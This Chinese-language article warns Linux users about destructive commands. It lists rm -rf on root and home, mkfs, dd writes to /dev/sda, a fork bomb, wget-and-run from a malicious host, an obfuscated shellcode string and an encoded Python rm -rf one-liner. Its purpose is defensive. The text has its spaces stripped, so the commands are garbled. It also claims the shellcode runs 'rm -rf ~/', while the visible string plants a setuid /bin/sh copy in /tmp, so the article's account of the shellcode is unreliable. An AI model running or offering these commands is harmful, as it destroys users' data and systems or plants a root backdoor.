本文列出的命令一定不要运行,即使你觉得很好奇,除非你是在虚拟机上运行(有问题可以恢复),因为它们会真正摧毁你的系统。所以最好不要在root等高管理权限下执行命令,这是个好习惯。Linux系统迟早会像Windows一样普及,使用它的人会越来越多,包括那些不太懂电脑的人。这篇文章的目的就是要告诉大家:Linux在给你最大程度的自由的同时,也让系统更容易被破坏。如果不理解某些命令的含义,下载并执行包含恶意命令的脚本,或者被诱骗运行某些命令,很容易让你哭的来不及。这并不是说Linux不安全,而是说Linux在不懂Linux而且很粗心的人面前很没有安全感。不管是Windows还是Linux,人本身就是最大的不安全因素。下面的命令会删除你硬盘上的文件,rm的-r递归删除,-f强制删除都是非常危险的选项,即使在日常操作中,也会遇到误删文件的情况。sudorm-rf/删除根分区sudorm-rf中的所有文件。删除当前目录下的所有文件sudorm-rf*同上rm-rf*orrm-rf*.*同上rm-rf~/&删除root分区和home目录,即使你不是root,home目录没有免疫力。同样,如果你不知道mkfs.xxxx(xxxx可以是vfat、ext2、ext3、bfs…)是一个格式化命令,运行以下命令将擦除你的硬盘分区:sudomkfs.xxxxdd是一个强大的IO输入和输出定位工具,如果使用不当,破坏性很大,不仅是当前分区,还有当前系统,有时甚至是整个硬盘。sudoddif=/dev/zeroof=/dev/sda清除所有硬盘。sudoddif=/dev/sdaof=/dev/sdb用第一个硬盘的内容覆盖第二个硬盘的内容。sudoddif=somethingof=/dev/sda将垃圾数据写入硬盘。同理,直接将命令结果指向硬盘相当于往硬盘写入垃圾数据:any_command>/dev/sda破坏硬盘上的sda和sdb随机数据,或者其他类似的名字.Linux的/dev系统为操作硬件提供了便捷而强大的功能,也让破坏变得更加容易。fork命令打开一个子进程。如果fork放在***循环中,子进程最终会耗尽所有内存资源::(){:|:&};:这个看不懂的符号可以让shell不停的fork子进程,***导致内存耗尽,不得不重启。这不是错误,但Shell语句是故意以缩写形式编写的。以下情况也是如此:有时候forkwhilefork,压缩包也是一个破坏源~有些压缩包需要你解压到某个系统已经存在的目录下。数以千计的小文件,各种文件名试图覆盖您现有的文件。一些压缩包看起来很小,但解压后是千兆字节的垃圾数据,这些数据会淹没您的硬盘。从非官方网站下载的程序和脚本也可能包含恶意命令,不要随便执行:wget[url]http://some_place/some_file[/url]sh./some_filewget[url]http://hax018r.org/malicious-script[/url]sh./malicious-script一定要保证脚本的来源是合法的,有能力的可以阅读它的代码。即使有源代码的程序,也不要随便编译执行:charesp[]__attribute__((section(".text")))/*e.s.prelease*/="xebx3ex5bx31xc0x50x54x5ax83xecx64x68""xffxffxffxffx68xdfxd0xdfxd9x68x8dx99""xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7""x56x04xf7x56x08xf7x56x0cx83xc4x74x56""x8dx73x08x56x53x54x59xb0x0bxcdx80x31""xc0x40xebxf9xe8xbdxffxffxffx2fx62x69""x6ex2fx73x68x00x2dx63x00""cp-p/bin/sh/tmp/.beyond;chmod4755/tmp/.beyond;";上面看起来就是一堆无意义的十六进制数据,如果有人告诉你,运行这个程序,不用输入密码就可以获得系统的root权限。不要相信他,上面的程序实际上运行了“rm-rf~/&”。像python这样的脚本语言也可以用来造成破坏:python-c'importos;os.system("".join([chr(ord(i)-1)foriin"sn!.sg!"]))'这个程序实际上会执行rm-rf*,也许你想知道“sn!.sg!”是什么?上面程序结尾的意思,其实就是rm-rf*每个字母的下一个!那么我们如何避免运行恶意程序呢?***,日常用户不要使用root作为程序。如果当前用户不是root用户,危害范围会小很多。第二,不要盲目运行命令。你需要知道哪些命令是做什么用的,不要运行你不知道的命令。在运行可能具有破坏性的程序时,请小心检查您的输入。第三,确保来源合法。需要保证软件和脚本的来源是合法的。四、备份你的数据***有一点,虽然比较消极,但确实非常重要:经常备份你的数据!!
